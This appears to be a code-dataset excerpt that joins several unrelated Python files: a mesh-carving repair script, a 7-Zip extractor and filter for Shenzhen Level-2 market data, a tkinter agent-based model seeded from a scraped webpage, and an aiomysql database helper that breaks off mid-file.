#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_direction.obj")
##area
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['area']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_area.obj")
##level
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['level']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level.obj")
##curvature
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['curvature']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_curve.obj")
#different combinations including some results from mode 4
#
#combinations
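#each run below sets CarveFunc.indicators to a two-indicator combination,
#restores the preserved model, carves again and writes its own *_OUTPUT_*.obj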
CarveFunc.indicators = [ 'level', 'volume']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_vol.obj")
CarveFunc.indicators = [ 'level', 'area']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_area.obj")
CarveFunc.indicators = [ 'level', 'flatness']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_flat.obj")
CarveFunc.indicators = [ 'level', 'depth']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_depth.obj")
CarveFunc.indicators = [ 'level', 'curvature']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_curve.obj")
CarveFunc.indicators = [ 'level', 'dof']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_dof.obj")
CarveFunc.indicators = [ 'directions', 'volume']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_vol.obj")
CarveFunc.indicators = [ 'directions', 'area']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_area.obj")
CarveFunc.indicators = [ 'directions', 'flatness']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_flat.obj")
CarveFunc.indicators = [ 'directions', 'depth']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_depth.obj")
CarveFunc.indicators = [ 'directions', 'curvature']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_curve.obj")
CarveFunc.indicators = [ 'directions', 'dof']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_dof.obj")
CarveFunc.indicators = [ 'distanceToCenter', 'volume']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_vol.obj")
CarveFunc.indicators = [ 'distanceToCenter', 'area']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_area.obj")
CarveFunc.indicators = [ 'distanceToCenter', 'flatness']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_flat.obj")
CarveFunc.indicators = [ 'distanceToCenter', 'depth']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_depth.obj")
CarveFunc.indicators = [ 'distanceToCenter', 'curvature']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_curve.obj")
CarveFunc.indicators = [ 'distanceToCenter', 'dof']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_dof.obj")
##complex combinations
#CarveFunc.indicators = ['dof', 'level', 'volume']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level_vol.obj")
#CarveFunc.indicators = ['dof', 'level', 'area']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level_area.obj")
#CarveFunc.indicators = ['dof', 'level', 'flatness']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level_flat.obj")
#CarveFunc.indicators = ['dof', 'level', 'depth']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level_depth.obj")
#CarveFunc.indicators = ['dof', 'level', 'curvature']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level_curve.obj")
#CarveFunc.indicators = ['dof', 'directions', 'volume']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_directions_vol.obj")
#CarveFunc.indicators = ['dof', 'directions', 'area']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_directions_area.obj")
#CarveFunc.indicators = ['dof', 'directions', 'flatness']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_directions_flat.obj")
#CarveFunc.indicators = ['dof', 'directions', 'depth']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_directions_depth.obj")
#CarveFunc.indicators = ['dof', 'directions', 'curvature']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_directions_curve.obj")
#CarveFunc.indicators = ['dof', 'distanceToCenter', 'volume']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist_vol.obj")
#CarveFunc.indicators = ['dof', 'distanceToCenter', 'area']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist_area.obj")
#CarveFunc.indicators = ['dof', 'distanceToCenter', 'flatness']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist_flat.obj")
#CarveFunc.indicators = ['dof', 'distanceToCenter', 'depth']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist_depth.obj")
#CarveFunc.indicators = ['dof', 'distanceToCenter', 'curvature']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist_curve.obj")
#CarveFunc.indicators = ['level', 'volume', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_vol_dof.obj")
#CarveFunc.indicators = ['level', 'area' , 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_area_dof.obj")
#CarveFunc.indicators = ['level', 'flatness', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_flat_dof.obj")
#CarveFunc.indicators = ['level', 'depth', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_depth_dof.obj")
#CarveFunc.indicators = ['level', 'curvature', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_curve_dof.obj")
#CarveFunc.indicators = ['directions', 'volume','dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_vol_dof.obj")
#CarveFunc.indicators = ['directions', 'area', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_area_dof.obj")
#CarveFunc.indicators = ['directions', 'flatness','dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_flat_dof.obj")
#CarveFunc.indicators = ['directions', 'depth', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_depth_dof.obj")
#CarveFunc.indicators = ['directions', 'curvature', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_curve_dof.obj")
#CarveFunc.indicators = ['distanceToCenter', 'volume', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_vol_dof.obj")
#CarveFunc.indicators = ['distanceToCenter', 'area', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_area_dof.obj")
#CarveFunc.indicators = ['distanceToCenter', 'flatness','dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_flat_dof.obj")
#CarveFunc.indicators = ['distanceToCenter', 'depth', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_depth_dof.obj")
#CarveFunc.indicators = ['distanceToCenter', 'curvature','dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_curve_dof.obj")
#CarveFunc.indicators = ['level', 'volume']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_volume.obj")
#CarveFunc.indicators = ['level', 'area' ]
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_area.obj")
#CarveFunc.indicators = ['level', 'flatness']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_flat.obj")
#CarveFunc.indicators = ['level', 'depth']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_depth.obj")
#CarveFunc.indicators = ['level', 'curvature']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_curve.obj")
#CarveFunc.indicators = ['directions', 'volume']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_volume.obj")
#CarveFunc.indicators = ['directions', 'area']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_area.obj")
#CarveFunc.indicators = ['directions', 'flatness']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_flat.obj")
#CarveFunc.indicators = ['directions', 'depth']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_depth.obj")
#CarveFunc.indicators = ['directions', 'curvature']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_curve.obj")
#CarveFunc.indicators = ['distanceToCenter', 'volume']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_volume.obj")
#CarveFunc.indicators = ['distanceToCenter', 'area']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_area.obj")
#CarveFunc.indicators = ['distanceToCenter', 'flatness']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_flat.obj")
#CarveFunc.indicators = ['distanceToCenter', 'depth']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_depth.obj")
#CarveFunc.indicators = ['distanceToCenter', 'curvature']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_curve.obj")
elif int(debugControl) == 6:
print("Mode 6 verify mode start...\n")
#Constrained Tetrahedralization
if False == TetraFunc.CDT():
print("Constrained Delauney Tetrahedralization FAILED!")
return
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CDT.obj")
#####copy datacopy
ModelDataFuncs.preserveModelData()
CarveFunc.globalOutputGlobalSTA = True
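#verification: carve three times with a single indicator each ('level',
#'distanceToCenter', 'directions') while global statistics output is enabled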
CarveFunc.indicators = [ 'level']
ModelDataFuncs.restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level.obj")
#####copy datacopy
CarveFunc.globalOutputGlobalSTA = True
CarveFunc.indicators = [ 'distanceToCenter']
ModelDataFuncs.restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist.obj")
#####copy datacopy
CarveFunc.globalOutputGlobalSTA = True
CarveFunc.indicators = [ 'directions']
ModelDataFuncs.restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_direction.obj")
elif int(debugControl) == 7 and isSemantic:
print("Mode7 deduce semantic mode start...\n")
#Constrained Tetrahedralization
TetraFunc.deduce_semantics_of_poly(isSemantic)
ModelDataFuncs.writer_poly_with_semantics(ModelData.strInputFileName + "_OUTPUT.poly")
else:
print("Full start...\n")
#Decompose all the triangles
DecomposeFunc.model_decompositionEx()
#Merge all the coplanar dictFaces
#coplaner_face_merge()
ModelDataFuncs.writer_obj(ModelData.strInputFileName +"_DEC.obj")
#Constrained Tetrahedralization
if False == TetraFunc.CDT():
print("Constrained Delauney Tetrahedralization FAILED!")
return
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CDT.obj")
#Heuristic carving
CarveFunc.heuristic_tet_carving()
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CARVE.obj")
#Reconstruct the mesh from tetrahedron
TetraFunc.extract_mesh_from_tet(isSemantic)
#Output
ModelDataFuncs.writer_obj(ModelData.strInputFileName + "_OUTPUT.obj")
if isSemantic:
ModelDataFuncs.writer_poly_with_semantics(ModelData.strInputFileName + "_OUTPUT.poly")
#Move the results to another folder
#filepath, filename=os.path.split(sys.argv[1])
#filepath = os.path.join(filepath, "res_tr1_with_tiny")
#filepath = "C:\\Users\\John\\Desktop\\rotterdam\\3-28-Witte_Dorp\\obj\\res_tr1_del_tiny\\"
#if not os.path.exists(filepath):
# os.mkdir(filepath)
#os.rename(inputFilePath, filepath + inputFilePath)
#os.rename(inputFilePath + "_OUTPUT.obj", filepath + inputFilePath + "_OUTPUT.obj")
#os.rename(inputFilePath + "_DEC.obj", filepath + inputFilePath + "_DEC.obj")
def Main():
if len(sys.argv) < 2:
print (
'''Usage of RepairShrink:
Python RepairShrink.py MODELFILEPATH(.obj|.poly) (-s) debugControl
Note: the obj format does not support semantics, while the poly format supports basic CityGML semantics''')
sys.exit()
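#directory argument: process every .poly file in the folder with the same flags;
#otherwise a single .obj/.poly file is handled below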
if os.path.isdir(sys.argv[1]):
os.chdir(sys.argv[1])
dFiles = []
for f in os.listdir('.'):
fileName, fileExt = os.path.splitext(f)
if fileExt == '.poly':
dFiles.append(f)
#elif fileExt == '.obj':
#dFiles.append(f)
if len(dFiles) == 0:
print ('Empty folder!')
sys.exit()
for fName in dFiles:
try:
if len(sys.argv) == 4:
if sys.argv[2] == '-s':
do_the_work(fName, True, sys.argv[3])
else:
do_the_work(fName, False, sys.argv[3])
elif len(sys.argv) == 3:
do_the_work(fName, False, sys.argv[2])
elif len(sys.argv) == 2:
do_the_work(fName, False, 0)
except ValueError:
print("{} has a problem").format(fName)
else:
fileName, fileExt = os.path.splitext(sys.argv[1])
if fileExt not in ('.obj', '.poly'):
print ("The input parameter 1 should be a OBJ or POLY file or a folder of a set of model files")
sys.exit()
else:
if len(sys.argv) == 4:
if sys.argv[2] == '-s':
do_the_work(sys.argv[1], True, sys.argv[3])
else:
do_the_work(sys.argv[1], False, sys.argv[3])
elif len(sys.argv) == 3:
do_the_work(sys.argv[1], False, sys.argv[2])
elif len(sys.argv) == 2:
do_the_work(sys.argv[1], False, 0)
if __name__ == '__main__':
Main()
``` |
{
"source": "Johnzjy/SZL2",
"score": 3
} |
#### File: Johnzjy/SZL2/GetSZL2snaplevels_v0.1_py3.py
```python
import os
import os.path
import re
import string
import sys
import time
input_dir="./";
output_dir="./";
#molde='_snap_level_spot'
molde='_hq_trade_spot'
#change the 7z.exe directory below to match the 7-Zip install path on your own system
PATH_7z_EXE = r'C:\Program Files (x86)\MyDrivers\DriverGenius'
def unzip_7z(_path,_file):
"""
unzip the 7-zip to the current path
Parameters
----------
_path: file path
_file: file name
Returns
-------
"""
rar_path=_path+_file
print (rar_path)
un_file_name,num=os.path.splitext(rar_path)
if len(num) == 4:
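#a four-character numeric suffix such as '.001' marks the first part of a split 7-zip archive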
un_path,format_name=os.path.splitext(un_file_name)
if format_name == ".7z":
un_path = '"{}"'.format(un_path)
_cwd=os.getcwd()
os.chdir(PATH_7z_EXE)# 7z.exe path
cmd = '7z.exe x "{}" -o{} -aos -r'.format(rar_path,un_path);
os.system(cmd)
os.chdir(_cwd)
else:
print ("%s is not 7-zip file"%rar_path)
def unzip_SZL2():
"""
unzip all snap_level_spot.7z file
Parameters
----------
Returns
-------
"""
print (os.getcwd())
for root, dirnames, filenames in os.walk(input_dir):
for filename in filenames:
#print filename.endswith(suffix)
if not filename.endswith(molde+".7z.001"):
continue
path=os.getcwd()+root[1:]+"\\"
print(path)
unzip_7z(path,filename)
def load_SZL2(code_list):
for root, dirnames, filenames in os.walk(input_dir):
for filename in filenames[:2]:
#print filename.endswith(suffix)
if not filename.endswith(molde+".txt"):
continue
filenamepath = os.path.join(root, filename)
print ("\n",filenamepath)
infile=open(filenamepath,'r')
Contents=[]
for line in infile:
try:
lines=line.split('\t')
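#the snapshot line is tab separated; column index 6 holds the security code matched against code_list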
codekey=lines[6]
#print codekey
if codekey in code_list:
Contents.append(line)
except Exception as e:
print (e)
try:
roots=root.split('\\')
for i in roots:
if i.isdigit() and len(i)==4:
date=i
filenames=filename.split('.txt')
#print filenames[0],roots[-1]
outfile='%s_%s.man' %(filenames[0],date)
outfid=open(os.path.join(output_dir, outfile),'w')
print(Contents)
for line in Contents:
try:
outfid.write(line)
except Exception as e:
print (e)
outfid.close()
except Exception as e:
print (e)
def init_level2():
"""
Import the security-code list from an external file; the output directory and code file are taken from the command line.
Parameters
----------
Returns
-------
"""
if len(sys.argv) < 3:
print ("python GetSZL2snaplevels_v0.1_py3.py outdir codefile")
sys.exit(1)
print (len(sys.argv))
output_dir=sys.argv[1]
print (output_dir)
codefile=sys.argv[2]
try:
infile=open(codefile,'r')
except:
print ("wrong code list file")
sys.exit(1)
codeList = []
for line in infile:
line=line.strip()
codeList.append(line)
return codeList
if __name__ == '__main__':
#codeList=init_level2()
codeList=["000001"]
load_SZL2(codeList)
``` |
{
"source": "johnztoth/guiwebscraping",
"score": 3
} |
#### File: johnztoth/guiwebscraping/gui.py
```python
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot
import matplotlib.animation
import matplotlib.backends.backend_tkagg
import agentframeworkweb
import random
import tkinter
import requests
import bs4
num_of_agents = 10
num_of_iterations = 10
neighbourhood = 10
no_rows=100
no_cols=100
agents = []
shuffled = []
environment=[]
fig = matplotlib.pyplot.figure(figsize=(7, 7))
ax = fig.add_axes([0, 0, 1, 1])
""" create flat environment """
for i in range(1, no_rows):
rowlist=[]
for j in range(1, no_cols):
rowlist.append(100)
environment.append(rowlist)
""" import starting positions from webpage """
r = requests.get('https://www.geog.leeds.ac.uk/courses/computing/practicals/python/agent-framework/part9/data.html')
content = r.text
soup = bs4.BeautifulSoup(content, 'html.parser')
td_ys = soup.find_all(attrs={"class" : "y"})
td_xs = soup.find_all(attrs={"class" : "x"})
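# each agent's start position comes from paired <td class="y"> / <td class="x"> cells scraped above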
""" Make the agents using the Agent class """
for i in range(num_of_agents):
y = int(td_ys[i].text)
x = int(td_xs[i].text)
agents.append(agentframeworkweb.Agent(environment, agents, y, x))
def update(frame_number):
print("frame_number = ", frame_number)
print("num_of_iterations = ", num_of_iterations)
fig.clear()
""" Move the agents, eat the environment, and share if necessary """
for j in range(num_of_iterations):
shuffled = random.sample(agents,len(agents)) # create a new shuffled list
for i in range(num_of_agents):
shuffled[i].move()
shuffled[i].eat()
shuffled[i].share_with_neighbours(neighbourhood)
""" plot agent positions and environment """
for i in range(num_of_agents):
matplotlib.pyplot.xlim(0, no_cols-1)
matplotlib.pyplot.ylim(0, no_rows-1)
matplotlib.pyplot.imshow(environment)
matplotlib.pyplot.scatter(agents[i].x,agents[i].y,color="red")
""" gui """
num_of_frames = 50
def run():
# keep a reference on the canvas so the animation is not garbage-collected when run() returns
canvas.animation = matplotlib.animation.FuncAnimation(fig, update, frames=num_of_frames, repeat=False)
canvas.draw()
root = tkinter.Tk()
root.wm_title("Model")
canvas = matplotlib.backends.backend_tkagg.FigureCanvasTkAgg(fig, master=root)
canvas._tkcanvas.pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)
menu_bar = tkinter.Menu(root)
root.config(menu=menu_bar)
model_menu = tkinter.Menu(menu_bar)
menu_bar.add_cascade(label="Model", menu=model_menu)
model_menu.add_command(label="Run model", command=run)
tkinter.mainloop()
``` |
{
"source": "johnzzu/python3-web",
"score": 3
} |
#### File: python3-web/www/orm.py
```python
import asyncio
import aiomysql
import logging
logging.basicConfig(level=logging.INFO)
@asyncio.coroutine
def create_pool(loop, **kw):
logging.info('create database connection pool...')
global __pool
__pool = yield from aiomysql.create_pool(
host=kw.get('host', 'localhost'),
port=kw.get('port', 3306),
user=kw['user'],
password=kw['password'],
db=kw['db'],
charset=kw.get('charset', 'utf8'),
autocommit=kw.get('autocommit', True),
maxsize=kw.get('maxsize', 10),
minsize=kw.get('minsize', 1),
loop=loop
)
@asyncio.coroutine
def select(sql, args, size=None):
logging.info('SQL: %s, args: %s', sql, args)
global __pool
with (yield from __pool) as conn:
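# DictCursor returns each row as a dict keyed by column name;
# '?' placeholders are rewritten to aiomysql's '%s' style before execution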
cursor = yield from conn.cursor(aiomysql.DictCursor)
yield from cursor.execute(sql.replace('?', '%s'), args or ())
if size:
rs = yield from cursor.fetchmany(size)
else:
rs = yield from cursor.fetchall()
yield from cursor.close()
logging.info('rows returned: %s' % len(rs))
return rs
@asyncio.coroutine
def execute(sql, args):
logging.info(sql)
with (yield from __pool) as conn:
try:
cursor = yield from conn.cursor()
yield from cursor.execute(sql.replace('?', '%s'), args or ())
affected = cursor.rowcount
yield from cursor.close()
except Exception as e:
raise e
return affected
``` |
{
"source": "joho84/MONAI",
"score": 2
} |
#### File: monai/apps/datasets.py
```python
import os
import sys
